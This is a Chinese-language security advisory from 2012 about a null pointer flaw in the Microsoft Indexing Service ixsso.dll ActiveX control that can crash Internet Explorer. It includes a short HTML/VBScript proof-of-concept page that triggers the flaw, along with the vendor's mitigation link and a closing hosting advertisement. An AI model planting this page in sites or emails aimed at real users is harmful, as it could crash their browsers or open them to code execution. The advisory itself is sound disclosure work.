Microsoft Indexing Service 'ixsso.dll' ActiveX控件拒绝

发布日期：2012-08-24
更新日期：2012-08-28

受影响系统：
Microsoft Indexing Service
描述：
--------------------------------------------------------------------------------
BUGTRAQ  ID: 55202-
 

Microsoft Indexing Service是为简单实现本地和网络全文搜索引擎的一个服务。

Microsoft Indexing Service 'ixsso.dll' ActiveX控件在实现上存在空指针引用错误，通过诱使受害者打开调用了受影响控件的恶意网页或HTML电子邮件，攻击者可利用此漏洞造成IE拒绝服务，也可能执行任意代码。

<*来源：coolkaveh
 
  链接：http://support.microsoft.com/kb/240797
*>

测试方法：
--------------------------------------------------------------------------------

警 告

以下程序(方法)可能带有攻击性，仅供安全研究与教学之用。使用者风险自负！

coolkaveh （）提供了如下测试方法：

<html> Exploit <object classid='clsid:A4463024-2B6F-11D0-BFBC-0020F8008024' id='target' /></object> <script language='vbscript'> targetFile = "C:\WINDOWS\system32\ixsso.dll" prototype = "Property Let OnStartPage As object" memberName = "OnStartPage" progid = "Cisso.CissoQuery" argCount = 1 Set arg1=Nothing target.OnStartPage arg1 </script>

建议：
--------------------------------------------------------------------------------
厂商补丁：

Microsoft
---------
Microsoft已经为此发布了一个安全公告（240797）以及相应补丁:

240797：如何禁止 ActiveX 控件在 Internet Explorer 中运行

链接：http://support.microsoft.com/kb/240797

服务器租用/服务器托管中国五强！虚拟主机域名注册顶级提供商！15年品质保障！--亿恩科技[ENKJ.COM]